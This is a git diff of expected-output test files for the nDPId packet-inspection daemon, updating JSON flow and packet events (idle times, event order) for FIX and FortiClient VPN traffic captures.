-00667{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1987,"flow_first_seen":1614758889588,"flow_last_seen":1614758889595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":39543,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1614758889595,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":34962,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00667{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1059,"flow_first_seen":1614758889589,"flow_last_seen":1614758889595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":28413,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1614758889595,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.9","src_port":34963,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614758889588,"flow_last_seen":1614758889588,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614758889588,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":34962,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614758889588,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889588,"pkt":"5kBKB+riApXG95NLCABFAAAweTwAAIAGAAAKZQACCmYAAoiSBAAt1D8pAAAAAHACgAEU8QAAAgQFtAMDAQA="} +00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614758889589,"flow_last_seen":1614758889589,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614758889589,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.9","src_port":34963,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614758889589,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889589,"pkt":"5kBKB+riApXG95NLCABFAAAweT0AAIAGAAAKZQACCmYACYiTBAAt1EIqAAAAAHACgAEU+AAAAgQFtAMDAQA="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614758889589,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889589,"pkt":"WgXZu6TVApXG95WRCABFAAAweT4AAIAGrLsKZgACCmUAAgQAiJIt1EL8LdQ\/KnASgAGE3gAAAgQFtAMDAQA="} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614758889589,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614758889589,"pkt":"5kBKB+riApXG95NLCABFAAAoeT4AAIAGAAAKZQACCmYAAoiSBAAt1D8qLdRC\/VAQgAEU6QAAAAAAAAAA"} +00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614758889588,"flow_last_seen":1614758889589,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1614758889589,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":34962,"dst_port":1024,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614758889589,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889589,"pkt":"WgXZu6TVApXG95WRCABFAAAweT8AAIAGrLMKZgAJCmUAAgQAiJMt1EWWLdRCK3ASgAF\/OwAAAgQFtAMDAQA="} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614758889589,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614758889589,"pkt":"5kBKB+riApXG95NLCABFAAAoeUAAAIAGAAAKZQACCmYACYiTBAAt1EIrLdRFl1AQgAEU8AAAAAAAAAAA"} +00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614758889589,"flow_last_seen":1614758889589,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1614758889589,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.9","src_port":34963,"dst_port":1024,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00667{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1987,"flow_first_seen":1614758889588,"flow_last_seen":1614758889595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":39543,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1614758889595,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":34962,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00667{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1059,"flow_first_seen":1614758889589,"flow_last_seen":1614758889595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":28413,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1614758889595,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.9","src_port":34963,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3049,"source":"fix2.pcap","alias":"nDPId-test","packets-captured":3049,"packets-processed":3046,"total-skipped-flows":0,"total-l4-data-len":67956,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1614758889595} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 3049/3046 diff --git a/test/results/forticlient.pcap.out b/test/results/forticlient.pcap.out index 235052a12..ca5d8bdbb 100644 --- a/test/results/forticlient.pcap.out +++ b/test/results/forticlient.pcap.out @@ -1,45 +1,45 @@ 00462{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"forticlient.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"forticlient.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1621067203571} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067203571,"flow_last_seen":1621067203571,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067203571,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1621067203571,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067203571,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfFtKMutlmzOAAAAALAC\/\/9bnAAAAgQFtAEDAwUBAQgKJ6c8YwAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1621067203633,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067203633,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8pJBAADQGX3NSUS4NwKgBsijL8W1kEcpBrZZsz6ASOEBvHAAAAgQFrAQCCAoGP5CkJ6c8YwEDAwo="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1621067203633,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067203633,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfFtKMutlmzPZBHKQoAQECzFugAAAQEICienPKAGP5Ck"} -01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067203571,"flow_last_seen":1621067203776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1621067203776,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01129{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067203571,"flow_last_seen":1621067203852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1611,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1621067203852,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -01407{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067203571,"flow_last_seen":1621067203854,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2620,"flow_avg_l4_payload_len":374,"midstream":0,"thread_ts_msec":1621067203854,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067204622,"flow_last_seen":1621067204622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067204622,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1621067204622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067204622,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfFuKMux1NwAAAAAALAC\/\/\/kHgAAAgQFtAEDAwUBAQgKJ6dAbwAAAAAEAgAA"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1621067204682,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067204682,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8DZFAADQG9nJSUS4NwKgBsijL8W6yVLN5sdTcAaASOEC\/ugAAAgQFrAQCCAoGP5ENJ6dAbwEDAwo="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1621067204682,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067204682,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfFuKMux1NwBslSzeoAQECwWWwAAAQEICienQKoGP5EN"} -01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067204622,"flow_last_seen":1621067204827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067204827,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01150{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067204622,"flow_last_seen":1621067204898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067204898,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -01416{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067204622,"flow_last_seen":1621067204900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067204900,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067205651,"flow_last_seen":1621067205651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067205651,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1621067205651,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067205651,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfFzKMsSeiBCAAAAALAC\/\/87PQAAAgQFtAEDAwUBAQgKJ6dEZQAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1621067205710,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067205710,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8c5FAADQGkHJSUS4NwKgBsijL8XP7CfxqEnogQ6ASOECEzAAAAgQFrAQCCAoGP5FzJ6dEZQEDAwo="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1621067205710,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067205710,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfFzKMsSeiBD+wn8a4AQECzbbQAAAQEICienRJ8GP5Fz"} -01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067205651,"flow_last_seen":1621067205856,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067205856,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01150{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067205651,"flow_last_seen":1621067205926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067205926,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -01416{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067205651,"flow_last_seen":1621067205928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067205928,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, 